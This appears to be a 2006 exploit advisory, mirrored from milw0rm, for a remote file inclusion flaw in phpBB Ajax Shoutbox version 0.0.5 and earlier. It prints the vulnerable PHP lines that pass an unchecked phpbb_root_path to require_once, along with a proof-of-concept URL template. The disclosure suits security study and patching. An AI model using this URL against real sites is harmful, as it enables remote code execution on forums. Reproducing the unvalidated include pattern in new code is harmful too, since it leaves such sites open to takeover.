Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14676
HistoryOct 13, 2006 - 12:00 a.m.

phpBB Ajax Shoutbox <= 0.0.5 Remote File Include Vulnerability

2006-10-1300:00:00
vulners.com
67

*

* Title: phpBB Ajax Shoutbox <= 0.0.5 (phpbb_root_path) Remote File Inclusion

* Author/Discovery: boecke

* Vulnerability Type: Remote File Inclusion

* Risk: High Risk

* Software Affected: phpBB Ajax Shoutbox <= 0.0.5

* Release Source: http://usuarios.lycos.es/kinfule/download.php?id=16

* Release Page @ phpBB.com : http://www.phpbb.com/phpBB/viewtopic.php?t=389032

*

* Literally shouts to: str0ke and henrik

* Don't promote Google-ism!

*

[ Vulnerable Code: ]
$phpbb_root_path = ( !@$phpbb_root_path ) ? './' : $phpbb_root_path;
require_once($phpbb_root_path . 'extension.inc');
require_once($phpbb_root_path . 'common.'.$phpEx);

[ Proof on Concept: ]
http://localhost/phpBB2/shoutbox.php?phpbb_root_path=

milw0rm.com [2006-10-12]